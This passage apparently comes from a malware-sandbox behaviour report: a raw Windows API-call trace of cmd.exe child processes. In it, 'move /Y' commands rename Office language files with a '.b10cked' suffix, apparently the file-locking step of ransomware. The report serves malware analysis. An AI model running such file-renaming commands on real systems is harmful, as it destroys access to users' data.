_MaxCount=0x7) returned -18 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0169.625] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0169.626] _wcsnicmp (_String1="/Y", 
_String2="/Y", _MaxCount=0x2) returned 0 [0169.626] _wcsicmp (_String1="OMSINT~1.TRX", _String2=".") returned 65 [0169.626] _wcsicmp (_String1="OMSINT~1.TRX", _String2="..") returned 65 [0169.626] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsint~1.trx")) returned 0x2020 [0169.626] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0169.626] SetErrorMode (uMode=0x0) returned 0x0 [0169.626] SetErrorMode (uMode=0x1) returned 0x0 [0169.626] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", nBufferLength=0x104, lpBuffer=0x2ae9d4, lpFilePart=0x2ae9bc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", lpFilePart=0x2ae9bc*="OMSINT~1.TRX") returned 0x3c [0169.626] SetErrorMode (uMode=0x0) returned 0x1 [0169.626] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0169.627] _wcsicmp (_String1="OMSINT~1.TRX", _String2=".") returned 65 [0169.627] _wcsicmp (_String1="OMSINT~1.TRX", _String2="..") returned 65 [0169.627] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsint~1.trx")) returned 0x2020 [0169.627] SetErrorMode (uMode=0x0) returned 0x0 [0169.627] SetErrorMode (uMode=0x1) returned 0x0 [0169.627] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", nBufferLength=0x104, lpBuffer=0x2aee50, lpFilePart=0x2aebe8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", lpFilePart=0x2aebe8*="OMSINT~1.TRX") returned 0x3c [0169.627] SetErrorMode (uMode=0x0) returned 0x1 
[0169.627] SetErrorMode (uMode=0x0) returned 0x0 [0169.627] SetErrorMode (uMode=0x1) returned 0x0 [0169.627] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2af058, lpFilePart=0x2aebe8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked", lpFilePart=0x2aebe8*="OMSINTL.DLL.trx_dll.b10cked") returned 0x4b [0169.627] SetErrorMode (uMode=0x0) returned 0x1 [0169.627] SetLastError (dwErrCode=0x0) [0169.627] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsintl.dll.trx_dll.b10cked")) returned 0xffffffff [0169.627] GetLastError () returned 0x2 [0169.628] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ae564, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae564) returned 0x3d2130 [0169.628] FindNextFileW (in: hFindFile=0x3d2130, lpFindFileData=0x2ae564 | out: lpFindFileData=0x2ae564) returned 0 [0169.628] GetLastError () returned 0x12 [0169.628] FindClose (in: hFindFile=0x3d2130 | out: hFindFile=0x3d2130) returned 1 [0169.630] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x3d1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1cc0) returned 0x3d2130 [0169.630] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ae7fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0169.630] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2ae7fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0169.630] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsintl.dll.trx_dll")) returned 0x2020 [0169.631] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\omsintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0169.633] FindClose (in: hFindFile=0x3d2130 | out: hFindFile=0x3d2130) returned 1 [0169.633] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ae7b0 | out: _Buffer=" 1") returned 9 [0169.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.633] GetFileType (hFile=0x7) returned 0x2 [0169.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0169.634] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ae73c | out: lpMode=0x2ae73c) returned 1 [0169.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.634] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ae770 | out: lpConsoleScreenBufferInfo=0x2ae770) returned 1 [0169.634] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0169.635] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ae7b0 | out: lpBuffer=" 1 
file(s) moved.\r\n") returned 0x1a [0169.635] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ae794, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ae794*=0x1a) returned 1 [0169.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.635] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0169.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.635] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0169.635] _get_osfhandle (_FileHandle=0) returned 0x3 [0169.635] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0169.635] SetConsoleInputExeNameW () returned 0x1 [0169.635] GetConsoleOutputCP () returned 0x1b5 [0169.636] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0169.636] SetThreadUILanguage (LangId=0x0) returned 0x409 [0169.636] exit (_Code=0) Process: id = "291" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0x888" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22889 start_va = 0x10000 end_va = 0x2ffff entry_point = 
0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22890 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22891 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22892 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 22893 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22894 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22895 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22896 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22897 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22898 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23453 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23454 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
23455 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 23456 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23457 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 23458 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23459 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23460 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23461 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23462 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23463 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23464 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23465 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23466 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23467 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 23468 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23469 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23470 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 23471 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 23472 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 23473 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 23474 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 23475 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename 
= "" Region: id = 23476 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 356 os_tid = 0x898 [0172.269] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afe84 | out: lpSystemTimeAsFileTime=0x1afe84*(dwLowDateTime=0x9c9491a0, dwHighDateTime=0x1d440a9)) [0172.269] GetCurrentProcessId () returned 0x888 [0172.269] GetCurrentThreadId () returned 0x898 [0172.269] GetTickCount () returned 0x32367 [0172.269] QueryPerformanceCounter (in: lpPerformanceCount=0x1afe7c | out: lpPerformanceCount=0x1afe7c*=22905811491) returned 1 [0172.269] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.269] __set_app_type (_Type=0x1) [0172.269] __p__fmode () returned 0x76b331f4 [0172.270] __p__commode () returned 0x76b331fc [0172.270] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.270] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.270] GetCurrentThreadId () returned 0x898 [0172.270] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x898) returned 0x38 [0172.270] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.270] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.270] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.270] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afe14 | out: phkResult=0x1afe14*=0x0) returned 0x2 [0172.270] VirtualQuery (in: lpAddress=0x1afe4b, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0x1af000, AllocationBase=0xb0000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.271] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.271] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.271] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.271] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afde4, dwLength=0x1c | out: lpBuffer=0x1afde4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.271] GetConsoleOutputCP () returned 0x1b5 [0172.271] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.271] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.271] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.271] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.271] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.271] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.271] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.271] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.272] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.272] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.272] GetEnvironmentStringsW () returned 0x390210* [0172.272] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0172.272] GetEnvironmentStringsW () returned 0x390210* [0172.272] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0172.272] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aed84 | out: phkResult=0x1aed84*=0x40) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0xa0, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x1, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x1, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x0, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x40, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x40, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.272] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x40, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.272] RegCloseKey (hKey=0x40) returned 0x0 [0172.272] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aed84 | out: phkResult=0x1aed84*=0x40) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x40, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x1, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x1, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x0, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x9, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x4, lpData=0x1aed90*=0x9, lpcbData=0x1aed88*=0x4) returned 0x0 [0172.273] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aed8c, lpData=0x1aed90, 
lpcbData=0x1aed88*=0x1000 | out: lpType=0x1aed8c*=0x0, lpData=0x1aed90*=0x9, lpcbData=0x1aed88*=0x1000) returned 0x2 [0172.273] RegCloseKey (hKey=0x40) returned 0x0 [0172.273] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.273] srand (_Seed=0x5b886388) [0172.273] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"" [0172.273] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.DLL.trx_dll.b10cked\"" [0172.273] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.273] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.273] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.274] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.274] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.274] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.274] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.274] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.274] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.274] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 
[0172.274] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.274] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.274] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.274] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.274] GetEnvironmentStringsW () returned 0x392360* [0172.274] FreeEnvironmentStringsW (penv=0x392360) returned 1 [0172.274] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.274] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.274] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.274] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.274] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.274] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.274] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.274] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.274] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.274] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.274] GetCurrentDirectoryW (in: nBufferLength=0x104, 